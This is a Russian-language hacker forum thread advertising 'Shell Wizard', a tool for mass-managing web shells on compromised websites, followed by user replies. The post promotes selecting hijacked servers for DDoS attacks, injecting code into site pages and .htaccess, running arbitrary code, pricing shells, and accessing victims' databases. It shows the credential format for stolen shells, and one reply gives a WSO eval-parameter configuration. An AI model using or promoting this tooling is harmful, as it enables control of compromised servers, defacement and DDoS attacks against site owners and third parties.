Вернуться   RDot > RDot.org > Релизы/Releases

Ответ
 
Опции темы Поиск в этой теме Опции просмотра
Старый 06.07.2010, 14:46   #1
Dr.Z3r0
 
Аватар для Dr.Z3r0
 
Регистрация: 05.07.2010
Сообщений: 101
Репутация: 156
По умолчанию [S]Hell Wizard - управляем веб-шеллами вместе c Dr.Z3r0 :)

Вообщем представляю вашему вниманию свою тулзу для управления шеллами:

[S]Hell Wizard
Текущая версия: 5.0 (28.12.2011)

Введение
Даная система предназначенна для массового управления веб шеллами нескольких типов. Как в плюс пытался создать максимально интуитивно понятный интерфейс, но и в тоже время оставить большой функционал в этой тулзе.

Основной принцип на котором основанна эта система - хранение информации о каждом из шеллов, о сервере на котором он расположен, о домене в БД - так упрощается выборка шеллов под ваши нужды.

К примеру, есть у вас огромный список из тысячи веб шеллов, и вам требуются шеллы под организацию ДДОС атаки - можно без проблем сделать выборку по параметрам PHP установленного на сервере, таким как есть ли возможность управлять set_time_limit-ом, можно ли установить ignore_user_abort=true, включены ли сокеты и отсортировать вывод по ширине канала сервера, ну чем не сказка?)

Основные достоинства
- Гибкая настройка выборки шеллов, и имхо достаточно интуитивно понятная
- Интересующая вас информация о сервере для каждого веб шелла
- Чек на PR каждого домена
- Настройки вывода как в браузер так и в файл
- Выполнение кода для каждого из веб шеллов
- reverse-ip для домена на котором расположен шелл в один клик
- Фишка с возможностью продолжения работы скрипта
- Возможно добавление хтмл кода в морду сайта
- Возможна организация ддос атак
- работа с бд прям из тулзы (скуль запросы и бекап БД)
- Ну и есть небольшой мануал, правдо недописанный до конца - так как меня вдруг охватил приступ лени.

Добавленно
С прошлой версии (4.3) много разных фишек не помню все, но вот то что вспомнил:
- Для каждого шелла создан свой файл-модуль (теперь с минимальными знаниями PHP можно добавить свой шелл)
- Добавленна поддержка проксей
- Проверка ТИЦ
- Проверка Alexa
- Расчет приблизительной цены шелла
- Разбиение шеллов на группы при добавлении их в БД
- Чек PR работает снова
- Добавление кода в htaccess если есть права
- И дадада! WSO поддерживатеся из коробки!

Шеллы с паролем добавлять в следующем формате:
Цитата:
если только пароль:
http://host1/path/wso.php|root
если пара логин/пароль:
http://host2/path/r57.php|admin|pass
Недостатки
Собственно это те недостатки которые я в ближайщем будущем планирую исправить:
- Как кое кто сказал - ужасный дизайн (ну не дизайнер я, хоть убей).

Где взять
По ссылке последняя версия: ShellWizard 5.0

Заключение
Тулза раз двадцать переписанная, могут быть баги, о багах пишите здесь.
Блаблабла, юзайте наздоровье)


В аттаче старая версия 4.3, ссылку на новую ищи выше
Вложения
Тип файла: rar shell_wizard.rar (53.7 Кб, 3450 просмотров)
Dr.Z3r0 вне форума   Ответить с цитированием
Старый 06.07.2010, 19:37   #2
esh
 
Регистрация: 06.07.2010
Сообщений: 2
Репутация: 0
По умолчанию

Релиз просто ШЕДЕВР! НЕТ СЛОВ!
Сам хотел написать, но я для этого слишком туп.

Единственный серьезный косяк, это неумение тулзы работать с нормальной POST\Session авторизацией, да да, как раз в той, что сделана для wSo, я между прочем был удивлен, почему в списке wSo так и не оказалось, а помоему самый ходовой шелл, не?

И ещё вот что. не нашел где там можно сделать DDoS, мб плохо искал? Ткните носом плз..........
esh вне форума   Ответить с цитированием
Старый 06.07.2010, 20:32   #3
esh
 
Регистрация: 06.07.2010
Сообщений: 2
Репутация: 0
По умолчанию

Цитата:
Сообщение от BlackSun Посмотреть сообщение
WSO нет скорее всего по той причине, что эта утилита писалась еще до того, как вышла хотя бы первая версия этого шелла.
WS0 нет, но способ авторизации всегда был, не?
Очень надеюсь, что автор его все-таки добавит в ближайшие намедни.

И все-же ответьте на мой поставленный вопрос по поводу DDoS`a!
esh вне форума   Ответить с цитированием
Старый 09.07.2010, 12:11   #4
GrandMaster
 
Регистрация: 09.07.2010
Сообщений: 16
Репутация: 0
По умолчанию

да, добавить бы туда wso и цены ей не будет
GrandMaster вне форума   Ответить с цитированием
Старый 10.07.2010, 18:39   #5
Nightmare
Banned
 
Регистрация: 06.07.2010
Сообщений: 162
Репутация: 10
По умолчанию

Цитата:
Сообщение от GrandMaster Посмотреть сообщение
да, добавить бы туда wso и цены ей не будет
Так его и добавлять то нечего, заходим в меню "Добавить шелл" и там:
1) ID: wso
2) Имя: WSO Shell
3) Регулярка: #WSO#i
4) eval GET: [none]
5) eval POST: a=Php&p1=[evalcode]

Все работает проще некуда, а вот косяк с запароленными шеллами действительно досадный.
Nightmare вне форума   Ответить с цитированием
Старый 28.10.2010, 12:29   #6
vasya
 
Регистрация: 28.10.2010
Сообщений: 2
Репутация: 0
По умолчанию

как такую ошибку исправить

Цитата:
(00:53:46) [2] preg_match() [<a href='function.preg-match'>function.preg-match</a>]: Compilation failed: missing ) at offset 22 Z:\home\localhost\www\shell_wizard\includes\func.s hell.php (line 61)
при чеке шеллов выдаёт
vasya вне форума   Ответить с цитированием
Старый 29.10.2010, 14:17   #7
Dr.Z3r0
 
Аватар для Dr.Z3r0
 
Регистрация: 05.07.2010
Сообщений: 101
Репутация: 156
По умолчанию

кривая регулярка в списке типов шеллов, подправь ее
__________________
На просьбы о помощи в sql-injection в ПМ не отвечаю. Для этих вопросов есть специальные темы.
Dr.Z3r0 вне форума   Ответить с цитированием
Старый 04.11.2010, 14:21   #8
euro
 
Регистрация: 09.07.2010
Сообщений: 66
Репутация: 8
По умолчанию

чек запароленых wso не планируется ?
euro вне форума   Ответить с цитированием
Старый 04.11.2010, 14:27   #9
paranoidchaos
Banned
 
Регистрация: 02.09.2010
Сообщений: 59
Репутация: -6
По умолчанию

Цитата:
а вот косяк с запароленными шеллами действительно досадный.
а чё за косяк ?? как ваще чекаете ? бейсик авторизация простая
paranoidchaos вне форума   Ответить с цитированием
Старый 12.11.2010, 11:44   #10
robert
 
Регистрация: 10.11.2010
Сообщений: 1
Репутация: 0
По умолчанию

Да, было бы не плохо сделать добавление WSO с авторизацией.
robert вне форума   Ответить с цитированием
Ответ

Метки
веб шеллы, manager, tools, web shells, wizard

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2019, Jelsoft Enterprises Ltd. Перевод: zCarot